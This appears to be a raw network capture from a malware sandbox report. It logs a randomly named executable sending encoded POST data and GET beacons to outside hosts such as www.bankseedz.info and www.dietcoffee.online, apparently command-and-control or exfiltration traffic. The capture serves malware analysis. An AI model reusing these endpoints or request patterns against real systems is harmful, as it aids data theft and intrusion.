                                                                                                            Dec 12, 2024 10:21:52.963040113 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                                                            Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                                                                            Dec 12, 2024 10:21:53.082370043 CET1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                                                                            Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.224918346.30.211.38801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:58.439832926 CET2472OUTPOST /an5q/ HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.bankseedz.info
                                                                                                            Referer: http://www.bankseedz.info/an5q/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 76 56 45 73 67 65 43 61 79 6c 75 2f 34 56 33 39 38 30 6c 52 37 49 63 31 58 59 66 48 52 50 4b 4d 41 69 53 76 39 34 6c 59 6d 31 49 42 77 45 6e 4b 67 72 44 73 58 36 74 36 66 71 48 38 46 6f 30 49 51 56 6c 4f 72 47 6e 33 41 74 69 62 69 42 33 61 71 50 48 42 59 71 59 41 76 32 45 2f 49 73 74 54 30 59 44 53 78 65 6d 6e 38 6d 67 2b 4d 58 31 58 53 6b 35 37 59 68 58 31 33 51 55 56 55 70 32 50 67 75 61 4a 66 4c 73 54 77 73 74 34 4b 52 68 35 50 43 2b 49 46 2f 74 34 76 64 30 49 50 75 55 4e 63 35 6f 53 45 42 76 75 76 46 47 54 50 4f 6c 6a 49 38 5a 59 61 77 52 59 55 37 48 4e 73 52 66 31 57 73 6f 6c 32 61 64 69 73 74 66 2b 4c 41 6f 6f 73 53 34 52 66 2f 2b 58 6c 55 72 50 51 2f 70 35 4d 36 44 78 4c 33 31 4f 58 44 6e 30 7a 6e 5a 42 67 39 77 4c 69 38 6d 49 79 38 53 54 51 7a 44 6b 79 45 67 6f 39 68 4d 6e 36 5a 71 47 57 74 64 65 6e 32 65 6f 38 64 44 2f 4d 68 73 52 6a 34 78 73 65 6a 31 53 34 73 45 64 44 4c 69 46 41 4c 31 72 6b 58 64 6d 4e 6d 62 78 34 62 4a 50 53 4c 54 67 73 36 42 4a 6c 56 6e 39 33 6a 38 42 65 7a [TRUNCATED]
                                                                                                            Data Ascii: x4=svVEsgeCaylu/4V3980lR7Ic1XYfHRPKMAiSv94lYm1IBwEnKgrDsX6t6fqH8Fo0IQVlOrGn3AtibiB3aqPHBYqYAv2E/IstT0YDSxemn8mg+MX1XSk57YhX13QUVUp2PguaJfLsTwst4KRh5PC+IF/t4vd0IPuUNc5oSEBvuvFGTPOljI8ZYawRYU7HNsRf1Wsol2adistf+LAoosS4Rf/+XlUrPQ/p5M6DxL31OXDn0znZBg9wLi8mIy8STQzDkyEgo9hMn6ZqGWtden2eo8dD/MhsRj4xsej1S4sEdDLiFAL1rkXdmNmbx4bJPSLTgs6BJlVn93j8BezZ2H3n9D2F1sNq67ozhVxOj39nDZZWz8KarGp5MSbnuBfdhXBWtrZ0D+6eYlR0n/0WA7mxteOXAEinc28AcH89P/OWuCbt6+6oLUKf7nwB8gfJpqSZlA1CdSYBRn2NKxu27Q7RFQy/8Yn8Cl8THXfafcqE34vV6RMFJFP3tBrtPMExJpckJRBIdFwS3P3eWuqjVSNMgINCKPGxypvh12G+LWkTq5gLLIEPpFM+OoLWGiY8p8ftEKJkt2285O5aVuQgl7gsuLo/b1M2xa4VMOrN89buKHPpRXBMQGHSotbq4GsdEUR7Z1oCwBrgLLaqnbuYvbcWlSUzXF8CVsFsHALFacT9E5zkH+PyX36j8CqHZuw4lsC3U3xuRvqnq3204CAi/10nSyTvEP0WiO6C4eEjfKIKAkPzTCDqoseVPa/iE54F8tr7MnXTGBKyYGpjcPgRPd+VMN8ZSqrKSt9Qup7SCwnZT/toTZKuAmconldjigeyayOSZDigwDnVgD6oaFcD4kDaJZoYWfBXOZeKxhv4rwXMFFu5pJw3eDSThJMM0v6DMfqh2QMeDLbY3kpkR8/gVBRHyL6E5gKjFy7cQ1D/tw2eeYiUzIXMgB8RO6YYM9xAnqaq2+ecUQCCFUDe142jIUIc0aLIEh38r/hgQofiN42Htdpu7JXzF [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:58.559422016 CET300OUTData Raw: 52 55 6c 6f 45 39 65 34 71 51 39 67 6f 57 44 65 6a 41 33 65 74 73 56 6f 56 6e 6e 5a 79 79 4a 6e 2b 36 75 6d 4e 70 6e 48 33 52 78 4c 64 42 39 64 61 41 78 55 48 50 50 54 64 5a 34 42 6f 4b 61 4e 47 35 59 4a 45 70 79 6d 6e 59 4f 51 79 61 39 50 59 62
                                                                                                            Data Ascii: RUloE9e4qQ9goWDejA3etsVoVnnZyyJn+6umNpnH3RxLdB9daAxUHPPTdZ4BoKaNG5YJEpymnYOQya9PYbNfy1x9KZOr5ja/pc4JSXYkQSLOT8GA4igU6xOP6GWhOR+ijG+hGFzD5x+66hxQVDp/XK58HuFdr/1uV/thxVoIsIEu9Ldu3cd2k0vig7G04xIZGBTmf4cqBrh5TJr11Yz7frnFfNzBpmlr8zD12KS53u0qOKJRPfn
                                                                                                            Dec 12, 2024 10:21:59.691046000 CET738INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:21:59 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.224918446.30.211.38801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:01.103338957 CET811OUTPOST /an5q/ HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.bankseedz.info
                                                                                                            Referer: http://www.bankseedz.info/an5q/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 76 56 45 73 67 65 43 61 79 6c 75 2f 35 56 33 39 74 30 6c 41 72 49 63 79 58 59 66 49 78 4f 42 4d 41 2f 74 76 34 41 31 59 52 68 49 42 69 63 6e 4a 53 54 44 6c 48 36 75 69 76 71 44 79 6c 70 32 49 51 56 54 4f 70 53 6e 33 41 35 69 4a 78 70 33 4c 2f 6a 41 44 6f 71 61 49 50 32 4a 2f 49 67 65 54 30 63 54 53 78 32 6d 6e 39 61 67 73 38 48 31 63 52 4d 35 71 34 68 5a 38 58 51 6c 56 55 73 75 50 67 2b 53 4a 63 66 73 54 44 6f 74 34 59 4a 68 75 75 43 2b 48 6c 2f 77 73 66 63 57 4f 66 37 77 56 74 56 6b 66 6d 42 51 77 73 74 64 63 34 75 5a 75 65 67 79 58 34 34 72 48 68 69 78 41 38 59 30 6d 41 3d 3d
                                                                                                            Data Ascii: x4=svVEsgeCaylu/5V39t0lArIcyXYfIxOBMA/tv4A1YRhIBicnJSTDlH6uivqDylp2IQVTOpSn3A5iJxp3L/jADoqaIP2J/IgeT0cTSx2mn9ags8H1cRM5q4hZ8XQlVUsuPg+SJcfsTDot4YJhuuC+Hl/wsfcWOf7wVtVkfmBQwstdc4uZuegyX44rHhixA8Y0mA==
                                                                                                            Dec 12, 2024 10:22:02.353169918 CET738INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:02 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.224918546.30.211.38801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:03.755090952 CET2472OUTPOST /an5q/ HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.bankseedz.info
                                                                                                            Referer: http://www.bankseedz.info/an5q/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 76 56 45 73 67 65 43 61 79 6c 75 74 4b 4e 33 78 75 63 6c 51 37 49 66 35 33 59 66 48 52 50 49 4d 41 6a 74 76 39 34 6c 59 6a 4e 49 42 7a 4d 6e 4a 77 72 44 2b 48 36 75 33 2f 71 48 38 46 6f 33 49 51 51 6f 4f 72 4c 53 33 43 56 69 62 67 6c 33 61 74 37 48 58 49 71 59 4d 50 32 47 2f 49 68 45 54 79 39 59 53 77 6d 49 6e 35 2b 67 73 50 2f 31 61 68 4d 36 67 59 68 5a 38 58 51 78 56 55 73 43 50 67 6d 77 4a 64 48 38 54 77 41 74 37 36 52 68 6f 50 44 4d 46 6c 2f 73 76 66 64 2b 49 50 79 35 4e 63 35 73 53 46 6c 46 75 76 4a 47 42 70 53 6c 6a 50 6f 65 58 71 77 53 46 45 37 48 44 4d 52 52 31 57 73 30 6c 32 61 64 69 73 52 66 2f 62 41 6f 6f 6f 47 33 66 2f 2f 2b 55 6c 55 69 43 77 7a 39 35 4d 65 70 78 50 4c 6c 4f 48 33 6e 7a 78 2f 5a 51 67 39 77 41 79 38 38 49 79 38 44 5a 77 79 39 6b 78 30 65 6f 39 52 63 6e 36 5a 71 47 54 35 64 61 78 4b 65 76 73 64 44 33 73 68 78 65 44 34 79 73 64 50 74 53 34 59 45 64 42 37 69 48 77 37 31 36 53 71 76 70 64 6d 50 37 59 62 78 4c 53 4c 38 67 73 32 72 4a 6c 63 4d 39 32 54 38 42 63 62 [TRUNCATED]
                                                                                                            Data Ascii: x4=svVEsgeCaylutKN3xuclQ7If53YfHRPIMAjtv94lYjNIBzMnJwrD+H6u3/qH8Fo3IQQoOrLS3CVibgl3at7HXIqYMP2G/IhETy9YSwmIn5+gsP/1ahM6gYhZ8XQxVUsCPgmwJdH8TwAt76RhoPDMFl/svfd+IPy5Nc5sSFlFuvJGBpSljPoeXqwSFE7HDMRR1Ws0l2adisRf/bAoooG3f//+UlUiCwz95MepxPLlOH3nzx/ZQg9wAy88Iy8DZwy9kx0eo9Rcn6ZqGT5daxKevsdD3shxeD4ysdPtS4YEdB7iHw716SqvpdmP7YbxLSL8gs2rJlcM92T8BcbZ1m3n+z2Kh8Nutr03hVpsj2t3DeNWh5masA96SSbbrBfH3nB0trdaD62eZRN0m+UWKoOyruOQEEjnWW9bcEAfP+fduWLto+6oK2Sc3XwAmQffgKTGlA18dS47RUqNKz627DDRFQy8tonlJF4lHXTgfcnB373V9CEFJEP35RrtXcE2DJdMJRU9dAsC3/LePPajYwlMloNEIPG82puD122+LXQDq6gLIqsPpkM+IoLKYyY/p8ffELZet1eK5MdaVvQgyOUsmro8Z1My1a4mMOzd8+PEKFvpAEZMXjrSoNbkzmsdL0RzZ1wowDveLKCqgq+Yt7cVryUwVF8dRsFyHAbFacP9E4HkHJbydgWjwSqJXOx/zc+DUxR1RtG3qwi03zAi42cmdiT1BP1X1e6+4eE/fOE8A2HzdyjquNeWM6/hdp4SyNqMMnHpGBPpYRRjcOQRIuWVP98ZSqrNSt9Uup+jCxW8T/tocteuBTIosFdiggepeyPTZDnJwDPzgCWoaU8D4kDdMpobc/BQOZa9xhvWrwbMEyC5vb43Hm+T35MM3v6AH/qg2QNVDKHI3hJketfgZipI+b6BxAKPOS+GQ1PntxSedpSUybPMgx8ROaYZVNwapKHp2+TzURSSFAfe0JmjKT8T4KLJHR3+r/9pQoHqN4+xtepu6pXzV [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:03.875967979 CET1764OUTData Raw: 52 55 6c 43 45 2f 32 6f 71 56 52 67 6f 53 66 65 6a 6a 76 65 6a 73 56 72 64 48 6e 51 79 79 49 32 2b 36 48 5a 4e 6f 37 74 33 52 64 4c 64 6d 56 64 62 54 70 55 4a 66 50 52 64 5a 34 31 6c 71 57 47 47 35 5a 34 45 70 75 6d 6e 59 65 51 79 59 31 50 59 72
                                                                                                            Data Ascii: RUlCE/2oqVRgoSfejjvejsVrdHnQyyI2+6HZNo7t3RdLdmVdbTpUJfPRdZ41lqWGG5Z4EpumnYeQyY1PYrNc+lx+H5OszDb8pc4jSWEeQQHOSqCA+XMU5BOF0mWychyWjGzuGEC25ge67XtQegN/G655ZeFMr/4BV+dHxRsms5Iu+bduze1pg0vkqbG54xI1GBbcf5A6BvF5TLD10oz8ILnDStyephtO8zaS2KC53r8qPulRYvn
                                                                                                            Dec 12, 2024 10:22:05.011869907 CET738INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:04 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.224918646.30.211.38801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:06.398662090 CET543OUTGET /an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.bankseedz.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:07.653134108 CET738INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Thu, 12 Dec 2024 09:22:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.224918777.68.64.45801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:13.041235924 CET2472OUTPOST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 4f 70 35 51 52 6d 63 67 7a 54 55 4f 4f 55 58 65 4a 35 51 47 63 58 39 79 4b 2b 2b 4d 71 53 6b 33 44 4d 79 69 2b 2b 35 69 64 7a 71 69 30 68 32 47 70 41 74 77 33 2b 4c 53 77 64 56 70 41 67 4f 6b 70 56 75 30 39 56 7a 78 51 35 6a 53 6c 35 52 4a 4a 55 73 39 49 7a 42 50 43 74 4a 4d 70 77 56 62 52 6c 72 71 78 2b 4a 62 69 6a 74 64 6a 4e 6c 50 62 37 4a 55 4c 6d 35 32 34 71 68 4c 61 34 33 4e 48 47 63 71 68 57 35 4d 64 6b 73 58 65 73 62 30 56 77 57 53 56 70 78 39 6e 51 6b 2f 6b 62 31 56 6b 6a 52 43 49 6b 52 4d 48 73 56 71 6f 30 36 2b 31 57 79 75 6b 4d 57 45 71 52 4d 58 67 49 38 6b 7a 6c 51 45 35 67 49 6a 66 4d 6f 43 37 4c 42 74 53 6b 6e 54 38 59 6d 59 33 52 6c 36 48 4e 57 65 54 61 49 78 76 67 4a 55 63 37 63 69 54 6a 71 71 7a 63 73 49 53 49 4c 6a 64 62 4e 37 47 58 6b 37 2b 2f 45 6a 4e 44 6e 52 4e 4a 55 52 73 6a 45 71 35 68 66 72 2f 55 72 4d 37 71 71 39 59 65 75 61 38 45 52 69 4a 2f 48 71 34 70 52 74 6f 6d 4a 6b 71 47 78 33 6d 58 4f 4d 50 4a 6a 71 38 75 4e 70 31 4b 64 [TRUNCATED]
